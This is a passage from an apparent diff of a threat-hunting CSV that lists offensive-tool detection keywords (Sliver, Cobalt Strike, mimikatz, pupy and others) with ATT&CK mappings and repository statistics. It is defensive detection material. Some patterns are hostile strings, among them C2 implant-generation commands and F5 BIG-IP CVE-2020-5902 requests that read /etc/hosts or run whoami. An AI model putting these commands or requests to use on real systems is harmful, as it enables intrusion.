TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*Generalrecon -noninteractive*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*generate beacon --mtls *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*Generalrecon -noninteractive*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*generate beacon --mtls *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*generate exe Shadow*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" -"*generate --http http*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*generate --mtls * --os windows *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*generate --mtls * --save *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*generate payload=*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*generate --tcp-pivot *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*generate/canaries.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*generate/implants.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*generate --http http*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate --mtls * --os windows *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate --mtls * --save *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate payload=*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*generate --tcp-pivot *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate/canaries.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate/implants.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*generate_beacon*","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z" "*generate_beanshell1*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" -"*generate_exploit_path_from_template*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" +"*generate_exploit_path_from_template*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" "*generate_golden_saml*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*generate_hta operation1*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*generate_jdk8u20*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" -"*generate_loader_cmd*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*generate_loader_cmd*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*generate_mozillarhino1*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*generate_mozillarhino2*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*generate_powershell operation1*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" @@ -10553,7 +10704,7 @@ "*GenerateDllBase64Hta*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*GenerateExeBase64*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*GenerateForcedBrowseWordlist.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" -"*generateInjectBinFile*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*generateInjectBinFile*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*Generate-Macro.ps1*","offensive_tool_keyword","Generate-Macro","Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method.","T1566 - T1059 - T1086 - T1056 - T1567","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/enigma0x3/Generate-Macro","1","1","N/A","N/A","7","665","218","2016-10-27T20:48:59Z","2015-01-09T01:34:22Z" "*GenerateParameterWordlist.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp SuiteExtracts the parameters from URLs in scope or from a selected host","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*GenerateReverseTcpDrone*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" @@ -10562,11 +10713,11 @@ "*GenericC2Relay.cs*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*Genetic-Malware/Ebowla*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*genHTA*","offensive_tool_keyword","genHTA","Generates anti-sandbox analysis HTA files without payloads. anti-sandbox analysis HTA File Generator","T1564 - T1059 - T1027 - T1055","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/genHTA","1","0","N/A","N/A","1","15","3","2017-03-16T21:49:59Z","2017-06-12T10:58:35Z" -"*genmkvpwd *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*gentilkiwi (Benjamin DELPY)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*genmkvpwd *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*gentilkiwi (Benjamin DELPY)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*gentilkiwi*","offensive_tool_keyword","mimikatz","author of mimikatz and multiple other windows exploitation tools","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*GeorgePatsias/ScareCrow*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","437","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" -"*georgesotiriadis/Chimera*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*GeorgePatsias/ScareCrow*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","438","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" +"*georgesotiriadis/Chimera*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" "*geowordlists --postal-code 75001 --kilometers 25 --output-file /tmp/around_paris.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*GET */login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" "*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" @@ -10576,295 +10727,295 @@ "*GET *https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=whoami*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*get_beacon(*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*get_BeaconHealthCheck_settings*","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 